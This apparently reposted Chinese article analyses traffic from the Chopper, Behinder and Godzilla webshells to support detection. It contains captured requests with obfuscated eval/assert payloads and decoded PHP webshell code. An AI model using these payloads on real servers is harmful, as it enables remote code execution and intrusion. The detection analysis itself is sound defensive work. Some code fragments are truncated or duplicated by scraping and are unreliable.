设为首页收藏本站
开启辅助访问

常见webshell工具流量特征分析(哥斯拉、冰蝎、蚁剑、菜刀)

 您所在的位置:网站首页 中国蚁剑添加配置连接密码 常见webshell工具流量特征分析(哥斯拉、冰蝎、蚁剑、菜刀)

常见webshell工具流量特征分析(哥斯拉、冰蝎、蚁剑、菜刀)

#常见webshell工具流量特征分析(哥斯拉、冰蝎、蚁剑、菜刀)| 来源: 网络整理| 查看: 265

抓取分析菜刀流量 - BuFFERer - 博客园

中国菜刀 POST /niushop-master/shell.php HTTP/1.1 X-Forwarded-For: 141.245.0.248 Referer: http://192.168.48.128/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Host: 192.168.48.128 Content-Length: 676 Cache-Control: no-cache Connection: close ccs=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");")); ccs是连接密码

固定段: QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J 可变段: EQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D

URL解码+base64 解码+PHP代码格式化 得到 Base64 编码/解码 | 菜鸟工具 PHP格式化,在线美化PHP代码

@ini_set("display_errors","0"); @set_time_limit(0); if(PHP_VERSION 解base64两次

第一次请求和回复报文分析

报头 Accept: application/json, text/javascript, /; q=0.01 类型 Content-type: Application/x-www-form-urlencoded 检测思路 浏览器可接受任何文件,但最倾向application/json和 text/javascript 。 Content-type字段作为一个弱特征,辅助其他特征来检测

流量分析:

POST /niushop-master/upload/avator/1685262585.php HTTP/1.1 Host: 192.168.48.128 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Content-type: application/x-www-form-urlencoded Referer: http://192.168.48.128/niushop-master/FY/5/1685262585.php User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Content-Length: 3544 Connection: close Accept-Encoding: gzip, deflate 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

image.png

AES解密(密钥md5 第1-16位)e45e329feb5d925b 下图为结果。 assert|eval(base64_decode('QGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIG1haW4oJGNvbnRlbnQpDQp7DQoJJHJlc3VsdCA9IGFycmF5KCk7DQoJJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRjb250ZW50KTsNCiAgICBAc2Vzc2lvbl9zdGFydCgpOyAgLy/liJ3lp4vljJZzZXNzaW9u77yM6YG/5YWNY29ubmVjdOS5i+WQjuebtOaOpWJhY2tncm91bmTvvIzlkI7nu61nZXRyZXN1bHTml6Dms5Xojrflj5Zjb29raWUNCg0KICAgIGVjaG8gZW5jcnlwdChqc29uX2VuY29kZSgkcmVzdWx0KSk7DQp9DQoKZnVuY3Rpb24gRW5jcnlwdCgkZGF0YSkKewogQHNlc3Npb25fc3RhcnQoKTsKICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCiAgICAJewogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsKICAgIAkJCSAkZGF0YVskaV0gPSAkZGF0YVskaV1eJGtleVskaSsxJjE1XTsKICAgIAkJCX0KCQkJcmV0dXJuICRkYXRhOwogICAgCX0KICAgIGVsc2UKICAgIAl7CiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsKICAgIAl9Cn0KJGNvbnRlbnQ9ImFtaG9VbFJQV2pZeVMzZHVjalJyWmxSSlJ6aFhNRGRVYzJsYVlUVlhUazlrVW5Gak1qVmFUV05ZWW5wYVJHZEliMVZJTkdJd2FVMXpVVUZDU21oWVdFbzNWMkp1VDFSbVFtbDRORWc1UXpjeE1rVmFWRVpKZFVSMU5HTTRRMHhDWjBGRVoydHdRMDR6UWxONVJYaHlTRzFVUldWTGVXOXdRM1pUWjNsaWFtUnNZVzkzZVVabk1GZ3dhRmR6UldGVmVUTXliazlqYms5VFoyRnBUV3d6Y1RVMlkzWldTV3A2VURRd1NVYzJkbEpTU20xRGVESmtRV05FTkhFMFdFcEhiRnBFVGs1clNHeFBRMUo1VFUxTFF6UXphWFIwZVVkMlZtWkthVGxHU1ZWbmVEVk5aek5oU2tsMVNFNU5TV0ZsV0ZaaFRUTXpWakk0YVdKdVdHWkJTMHAzV21kTFJtOUJUbU5xYkZBd2RXRTBabXcyWkhGRU9FMU5aRUpPUVV0dVVYSTNhM0JzY1RZMGNWQkVkbU5DT0ZOTmFqTk1abE5ZVjNoVmVHVlhjRzkyVDBwUVdqVlZjVVJ1VUhaS2JXeHdaRzFoY2taNFQwMURVMWxDVlVsaU5XeGtUWFIzYVhaa2ExZzBTVUpTUlUwelNIRldkMk0xTUZwUWFtaEdTalYwVjJVemFYTTFaVmh2VkVzelVGUktkMEpFTVZCcmFqVm5PVXRTTUd4SGRqZG9VR3RQUWxWWVlVRkViVEUzZW1KeFJVdGthMGh2VTNVM09VNDJWMnR3UzFsVGJuQjRZVkJtT0doaWJUVkxTVVZ2VW05TGVtYzVOWFJsWmtSclVERmlUMUkyUVVoU1RVTm5NbkJYT1hCTFFXaHlabTQyVDBwNWFUZzNWSFpMU0VOaU1VTkJZbUpqTTNwYVMwZFZNMkZJUXpKYU9UVnhVM0pLUjNKc1l6aElVa05CWVc0eWNXWnRNV2RIUTNsbGJtc3hURGRsZDNKM04wWkZXa0puUkV0V1EyVTJiMnRGUmtSdlFYTmpVMjVvY1hGS1Z6VXlaV2hwYWxwa2FHeHBkbE0yU2xoTFMwRnZlVnBhYjNnMlNGQmplWFZTZURoalZIaE5aME5WV1c0eFQyNWliRkZIYzJRNWEyazBNV3RzWlZWcWJHdHhPRzFqTjI0emMydDVaR2RZVDFoSFJYUTNkRTlsZEZVMFZIcExZazFRUVhOMk1saEtZbmhLZG5CUE5tRlRhbTVyZDFOUVZGWk9jMGx5YjJ3eFJEUXhNWEU1WTNWbVozVk9RVUZHUVRCWWEwTkdkek5qY1ROdFVVdzBTVkJ6Tm5CSVNtc3lUVEpVUm5JNVMydGpUR0kwZEZORlRtSmtablpWWTFwbGIwbHNSbEo1Vld0cGRHZzBkVkZYUzJkS1RXeHlTSFZGY1U1SWRrZGxTWFJSTlZKNGFrcDVOR3BwYkU1eWNISk5OVlpCV25FNGRrVmhVbkZYWW1WVmJYSk1SRTlOYlZaRVRGVm9PRXR2Um1SVlVqWkNNM1JqUjBWcFdsUnlSRGRSU0c0MVFsTldNbEJEVEZsc09XaHBkbUpUY0dsdmRWTmFZWGgxUVdFMVQwWk5ZMkpKWkhsaVFqYzBZWGcwYjNWMWVuZGthM2hwZVhnNU5XVTFlV2x6YUV4MlZnPT0iOyRjb250ZW50PWJhc2U2NF9kZWNvZGUoJGNvbnRlbnQpOw0KbWFpbigkY29udGVudCk7'));

再解一次base64 即可出密文

@error_reporting(0); function main($content) { $result = array(); $result["status"] = base64_encode("success"); $result["msg"] = base64_encode($content); @session_start(); //初始化session,避免connect之后直接background,后续getresult无法获取cookie echo encrypt(json_encode($result)); } function Encrypt($data) { @session_start(); $key = $_SESSION['k']; if(!extension_loaded('openssl')) { for($i=0;$i return openssl_encrypt($data, "AES128", $key); } } $content="amhoUlRPWjYyS3ducjRrZlRJRzhXMDdUc2laYTVXTk9kUnFjMjVaTWNYYnpaRGdIb1VINGIwaU1zUUFCSmhYWEo3V2JuT1RmQml4NEg5QzcxMkVaVEZJdUR1NGM4Q0xCZ0FEZ2twQ04zQlN5RXhySG1URWVLeW9wQ3ZTZ3liamRsYW93eUZnMFgwaFdzRWFVeTMybk9jbk9TZ2FpTWwzcTU2Y3ZWSWp6UDQwSUc2dlJSSm1DeDJkQWNENHE0WEpHbFpETk5rSGxPQ1J5TU1LQzQzaXR0eUd2VmZKaTlGSVVneDVNZzNhSkl1SE5NSWFlWFZhTTMzVjI4aWJuWGZBS0p3WmdLRm9BTmNqbFAwdWE0Zmw2ZHFEOE1NZEJOQUtuUXI3a3BscTY0cVBEdmNCOFNNajNMZlNYV3hVeGVXcG92T0pQWjVVcURuUHZKbWxwZG1hckZ4T01DU1lCVUliNWxkTXR3aXZka1g0SUJSRU0zSHFWd2M1MFpQamhGSjV0V2UzaXM1ZVhvVEszUFRKd0JEMVBrajVnOUtSMGxHdjdoUGtPQlVYYUFEbTE3emJxRUtka0hvU3U3OU42V2twS1lTbnB4YVBmOGhibTVLSUVvUm9Lemc5NXRlZkRrUDFiT1I2QUhSTUNnMnBXOXBLQWhyZm42T0p5aTg3VHZLSENiMUNBYmJjM3paS0dVM2FIQzJaOTVxU3JKR3JsYzhIUkNBYW4ycWZtMWdHQ3llbmsxTDdld3J3N0ZFWkJnREtWQ2U2b2tFRkRvQXNjU25ocXFKVzUyZWhpalpkaGxpdlM2SlhLS0FveVpab3g2SFBjeXVSeDhjVHhNZ0NVWW4xT25ibFFHc2Q5a2k0MWtsZVVqbGtxOG1jN24zc2t5ZGdYT1hHRXQ3dE9ldFU0VHpLYk1QQXN2MlhKYnhKdnBPNmFTam5rd1NQVFZOc0lyb2wxRDQxMXE5Y3VmZ3VOQUFGQTBYa0NGdzNjcTNtUUw0SVBzNnBISmsyTTJURnI5S2tjTGI0dFNFTmJkZnZVY1plb0lsRlJ5VWtpdGg0dVFXS2dKTWxySHVFcU5IdkdlSXRRNVJ4akp5NGppbE5ycHJNNVZBWnE4dkVhUnFXYmVVbXJMRE9NbVZETFVoOEtvRmRVUjZCM3RjR0VpWlRyRDdRSG41QlNWMlBDTFlsOWhpdmJTcGlvdVNaYXh1QWE1T0ZNY2JJZHliQjc0YXg0b3V1endka3hpeXg5NWU1eWlzaEx2Vg=="; $content=base64_decode($content); main($content);

这个变量名称和里面的内容为随机生成的, 目的是为了绕过 content这个变量名称和里面的内容为随机生成的,目的是为了绕过‘Content-Length。

第一个连接后的响应包(解Base64):

{"status":"c3VjY2Vzcw==","msg":"amhoUlRPWjYyS3ducjRrZlRJRzhXMDdUc2laYTVXTk9kUnFjMjVaTWNYYnpaRGdIb1VINGIwaU1zUUFCSmhYWEo3V2JuT1RmQml4NEg5QzcxMkVaVEZJdUR1NGM4Q0xCZ0FEZ2twQ04zQlN5RXhySG1URWVLeW9wQ3ZTZ3liamRsYW93eUZnMFgwaFdzRWFVeTMybk9jbk9TZ2FpTWwzcTU2Y3ZWSWp6UDQwSUc2dlJSSm1DeDJkQWNENHE0WEpHbFpETk5rSGxPQ1J5TU1LQzQzaXR0eUd2VmZKaTlGSVVneDVNZzNhSkl1SE5NSWFlWFZhTTMzVjI4aWJuWGZBS0p3WmdLRm9BTmNqbFAwdWE0Zmw2ZHFEOE1NZEJOQUtuUXI3a3BscTY0cVBEdmNCOFNNajNMZlNYV3hVeGVXcG92T0pQWjVVcURuUHZKbWxwZG1hckZ4T01DU1lCVUliNWxkTXR3aXZka1g0SUJSRU0zSHFWd2M1MFpQamhGSjV0V2UzaXM1ZVhvVEszUFRKd0JEMVBrajVnOUtSMGxHdjdoUGtPQlVYYUFEbTE3emJxRUtka0hvU3U3OU42V2twS1lTbnB4YVBmOGhibTVLSUVvUm9Lemc5NXRlZkRrUDFiT1I2QUhSTUNnMnBXOXBLQWhyZm42T0p5aTg3VHZLSENiMUNBYmJjM3paS0dVM2FIQzJaOTVxU3JKR3JsYzhIUkNBYW4ycWZtMWdHQ3llbmsxTDdld3J3N0ZFWkJnREtWQ2U2b2tFRkRvQXNjU25ocXFKVzUyZWhpalpkaGxpdlM2SlhLS0FveVpab3g2SFBjeXVSeDhjVHhNZ0NVWW4xT25ibFFHc2Q5a2k0MWtsZVVqbGtxOG1jN24zc2t5ZGdYT1hHRXQ3dE9ldFU0VHpLYk1QQXN2MlhKYnhKdnBPNmFTam5rd1NQVFZOc0lyb2wxRDQxMXE5Y3VmZ3VOQUFGQTBYa0NGdzNjcTNtUUw0SVBzNnBISmsyTTJURnI5S2tjTGI0dFNFTmJkZnZVY1plb0lsRlJ5VWtpdGg0dVFXS2dKTWxySHVFcU5IdkdlSXRRNVJ4akp5NGppbE5ycHJNNVZBWnE4dkVhUnFXYmVVbXJMRE9NbVZETFVoOEtvRmRVUjZCM3RjR0VpWlRyRDdRSG41QlNWMlBDTFlsOWhpdmJTcGlvdVNaYXh1QWE1T0ZNY2JJZHliQjc0YXg0b3V1endka3hpeXg5NWU1eWlzaEx2Vg=="}

“status”:“c3VjY2Vzcw==” 解码base64 为success message 是一段超极长的字符串,分析冰蝎请求中的 PHP 代码,发现他就是 content 经过 base64 -> aes 加密后生成的,作用和请求中的 content 一致都是绕过 $Content-Length {“status”:“success”,“msg”: 这个返回数据特征已经在冰蝎 2.0 中已经被加入了Waf的检测规则当中,所以在冰蝎 3.0 当中用超大数据填充的方式绕过。

流量特征

冰蝎设置了10种User-Agent,每次连接shell时会随机选择一个进行使用。 检测思路 在较短较简单的content字段后加上fast_pattern关键字则会优先匹配这个content。避免浪费太长时间在匹配user-agent上。 snort编写可以用content:“User-Agent”;content:“浏览器版本”。来匹配相应的十个浏览器。

PHP webshell 中存在固定代码

流量特征 p o s t = D e c r y p t ( f i l e g e t c o n t e n t s ( “ p h p : / / i n p u t ” ) ) ; e v a l ( post=Decrypt(file_get_contents(“php://input”)); eval( post=Decrypt(fileg​etc​ontents(“php://input”));eval(post); 检测思路 content字段中,将eval($post)作为流量特征纳入。

长连接

流量特征 冰蝎通讯默认使用长连接,避免了频繁的握手造成的资源开销。默认情况下,请求头和响应头里会带有 Connection。 Connection: Keep-Alive 检****测思路 可以作为辅助的流量特征。 端口特征 冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。

第二个响应包 (解AES --> 解两次 Base64)

解AES --> 解两次 Base64 得到html文档 image.png

哥斯拉

学习文章: 哥斯拉Godzilla加密流量分析

哥斯拉的特征:

请求包特征与响应包特征。

image.png

解码连接数据包 默认PHP加密 image.png 报文反解密: 解URL编码 --> 解倒序 --> 解Base64 解倒序脚本:

def reverse_string(s): return s[::-1] original_string = "string" reversed_string = reverse_string(original_string) print(reversed_string) # 输出倒序字符串

image.png 再解base64 即可查看密文

@session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }

关于服务器shell的分析,详见本人学习的大佬文章。



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3